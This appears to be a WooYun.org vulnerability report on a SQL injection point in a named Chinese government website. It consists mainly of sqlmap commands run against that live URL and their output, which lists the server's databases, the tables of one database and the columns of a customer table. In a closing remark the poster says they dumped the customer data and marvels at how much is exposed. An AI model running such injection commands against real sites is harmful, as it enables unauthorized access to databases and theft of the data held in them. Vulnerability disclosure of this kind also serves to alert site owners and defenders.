WooYun.org

注入点：
http://www.anhuids.gov.cn/articleshow.asp?classid=516
E:\sqlmap2>sqlmap.py -u http://www.anhuids.gov.cn/articleshow.asp?classid=516
--dbs
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] wwww
E:\sqlmap2>sqlmap.py -u http://www.anhuids.gov.cn/articleshow.asp?classid=516
--tables -D Northwind
Database: Northwind
[31 tables]
+--------------------------------+
| Categories |
| CustomerCustomerDemo |
| CustomerDemographics |
| Customers |
| EmployeeTerritories |
| Employees |
| Invoices |
| Orders |
| Products |
| Region |
| Shippers |
| Suppliers |
| Territories |
| Alphabetical list of products |
| Category Sales for 1997 |
| Current Product List |
| Customer and Suppliers by City |
| Order Details Extended |
| Order Details |
| Order Subtotals |
| Orders Qry |
| Product Sales for 1997 |
| Products Above Average Price |
| Products by Category |
| Quarterly Orders |
| Sales Totals by Amount |
| Sales by Category |
| Summary of Sales by Quarter |
| Summary of Sales by Year |
| sysconstraints |
| syssegments |
+--------------------------------+
Table: Customers
[11 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| Address | nvarchar |
| City | nvarchar |
| CompanyName | nvarchar |
| ContactName | nvarchar |
| ContactTitle | nvarchar |
| Country | nvarchar |
| CustomerID | nchar |
| Fax | nvarchar |
| Phone | nvarchar |
| PostalCode | nvarchar |
| Region | nvarchar |
我只爆了cutormmer的，，，
信息量太多了，，太卡，，，，哇，，这么多的国家的信息，，